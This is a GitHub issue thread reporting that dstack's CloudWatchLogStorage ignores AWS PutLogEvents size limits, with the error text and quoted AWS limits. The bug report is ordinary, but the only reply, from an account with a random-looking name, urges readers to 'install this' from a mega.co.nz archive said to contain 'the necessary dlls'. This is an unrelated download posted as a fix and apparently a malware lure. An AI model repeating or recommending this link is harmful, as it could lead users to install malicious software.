### ISSUE TITLE
[Bug]: `CloudWatchLogStorage` doesn't respect `PutLogEvents` size limits

### ISSUE THREAD

**Issue by un-def** [dstackai/dstack#1711]
### Steps to reproduce

1. Start a run producing lots of logs (either more than 256KiB per event or more than 1MiB in a short time span, ≈ 5s)

### Actual behaviour

```
CloudWatch Logs error: InvalidParameterException: An error occurred (InvalidParameterException) when calling the PutLogEvents operation: [...]
```

### dstack version

0.18.14

### Additional information

https://docs.aws.amazon.com/AmazonCloudWatchLogs/latest/APIReference/API_PutLogEvents.html

> * The maximum batch size is 1,048,576 bytes. This size is calculated as the sum of all event messages in UTF-8, plus 26 bytes for each log event.
> * Each log event can be no larger than 256 KB.
> * The maximum number of log events in a batch is 10,000.

**Comment by KERERCVASD** [comment]
install this
https://mega.co.nz/#!9vE0jIrD!nkSuAAbrT1Sjn01VjaQfVQGAFLqvdIF4EkMeSLuKCWw
I put the necessary dlls in the archive
